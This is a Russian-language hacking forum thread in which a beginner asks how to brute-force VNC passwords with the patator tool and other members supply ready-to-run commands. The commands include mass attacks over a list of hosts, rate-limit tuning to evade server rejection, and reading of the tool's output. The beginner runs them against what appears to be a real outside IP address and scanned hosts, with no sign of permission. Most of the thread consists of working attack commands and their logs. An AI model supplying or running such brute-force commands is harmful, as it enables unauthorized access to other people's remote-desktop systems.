pratator -помогите новичку

Discussion in 'Песочница' started by lok888, 10 Mar 2017.

  1. lok888

    lok888 New Member

    Joined:
    5 Dec 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    прочел что pratator который идет в комплекте кали линукс брутит vnc.
    помогите с командами пожалуйста: как осуществить брут ip:8000 c помощью patator?
     
    #1 lok888, 10 Mar 2017
    Last edited: 12 Mar 2017
  2. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    patator. Пример:
    patator vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
     
  3. lok888

    lok888 New Member

    Joined:
    5 Dec 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    Да, я нашел такой пример но что-то не так сделал. Нужно ли заменять переменные кроме passwords.txt еще какие-то?

    добавил впередт patator, вроде запустился )) подожду результата

    прошло пол часа и ... ничего...
    вот так такую команду ввел:
    patator vnc_login host=116.58.241.185 password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0

    такой результат:
    Code:
    patator vnc_login host=101.2.1.01 password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0
    21:03:54 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-03-11 21:03 VLAT
    21:03:54 patator    INFO -                                                                             
    21:03:54 patator    INFO - code  size   time | candidate                          |   num | mesg
    21:03:54 patator    INFO - -----------------------------------------------------------------------------
    
    21:26:36 patator    INFO - Progress:   0% (0/91) | Speed: 1 r/s | ETC: 21:28:07 (00:01:31 remaining)
    
    22:23:20 patator    INFO - Progress:   0% (0/91) | Speed: 1 r/s | ETC: 22:24:51 (00:01:31 remaining)
    ^C22:23:41 patator    INFO - Hits/Done/Skip/Fail/Size: 0/0/0/0/91, Avg: 0 r/s, Time: 1h 19m 46s
    22:23:41 patator    INFO - To resume execution, pass --resume 0
    не подскажете что значит ? )) и почему полтора часа думал а прогресс 0% ?
     
    #3 lok888, 11 Mar 2017
    Last edited: 11 Mar 2017
  4. Zayac

    Zayac Banned

    Joined:
    15 Aug 2016
    Messages:
    108
    Likes Received:
    20
    Reputations:
    0
    А где коды ошибок ответы сервера? по них сразу видно в чем дело..
    Не совсем я разобрался зачем это retry при ошибке 'Authentication failure' пароль не подошел и patator все-ровно будет пробовать следующий из словаря..
    --max-retries тоже не совсем понятно что за полезная нагрузка если после 4 попыток по умолчанию спокойно перебирает пароль дальше...

    запускаю брут так:
    Code:
    patator vnc_login host=FILE1 1=host.txt password=FILE0 0=pass.txt -t 1 --rate-limit=3 -x ignore:code=1 -l out
    при ошибке Session setup failed: "Your connection has been rejected нужно увеличивать --rate-limit задержку отправки пароля.. для обычного TightVNC 3sec - other 14-15sec.....

    Еще бы кто подсказал как сделать чтоб при code=0 Ok хост удалялся или как-то пропускался из брута(пробивал action free вываливается с ошибкой после кода 0). и это все хосты с ответами FAIL code xxx тоже б если на автомате удалялись из списка было б супер.
     
  5. lok888

    lok888 New Member

    Joined:
    5 Dec 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    Спасибо, так попробую.
    Я слвсем новичек -еще не знаю что в patatore означают какие команды(
     
  6. Zayac

    Zayac Banned

    Joined:
    15 Aug 2016
    Messages:
    108
    Likes Received:
    20
    Reputations:
    0
    если указать наоборот для хоста 0 а password 1 то вначале все пароли с словаря будут подбиратся к 1 хосту далее 2 и т. д. а так по паролю на каждый хост c файла host.txt
    -l out -- сохраняет логи брута в папку out
     
  7. lok888

    lok888 New Member

    Joined:
    5 Dec 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    запустил брут с вашей командой. пока такой вот результат:
    Code:
    patator vnc_login host=FILE1 1='/root/Рабочий стол/hosts' password=FILE0 0='/root/Рабочий стол/password.txt' -t 1 --rate-limit=3 -x ignore:code=1 -l out
    Directory '/root/out' is not empty, do you want to wipe it ? [Y/n]: y
    20:26:37 patator    INFO - Starting Patator v0.6 (http://code.google.com/p/patator/) at 2017-03-13 20:26 VLAT
    20:26:37 patator    INFO -                                                                             
    20:26:37 patator    INFO - code  size   time | candidate                          |   num | mesg
    20:33:50 patator    FAIL - xxx   50    0.000 | admin:145.24.321.111               |     9 | <class 'socket.error'> (111, 'Connection refused')
    20:35:00 patator    FAIL - xxx   39    0.000 | admin:145.24.321.111              |    10 | <class 'socket.timeout'> ('timed out',)
    20:35:30 patator    FAIL - xxx   50    0.000 | admin123:145.24.321.111            |    11 | <class 'socket.error'> (111, 'Connection refused')
    20:36:40 patator    FAIL - xxx   39    0.000 | admin123:145.24.321.111            |    12 | <class 'socket.timeout'> ('timed out',)
    
     
  8. Zayac

    Zayac Banned

    Joined:
    15 Aug 2016
    Messages:
    108
    Likes Received:
    20
    Reputations:
    0
    Хост неотвечает -- нет связи.. Откуда вообще такой IP 145.24.321 что за 321 ?? максимум 254
     
  9. lok888

    lok888 New Member

    Joined:
    5 Dec 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    знаю.)) наобум натыкал цифр, чтоб не показывать всем сканируемый IP.

    не отвечает - значит никак в него не "прорваться" ?
    или на нем вообще нет vnc ?

    просто nmap показал что удаленный рабочий стол есть на нем порт 3389. или я путаю понятия ?
     
  10. Zayac

    Zayac Banned

    Joined:
    15 Aug 2016
    Messages:
    108
    Likes Received:
    20
    Reputations:
    0
    вообще нет vnc порт 5900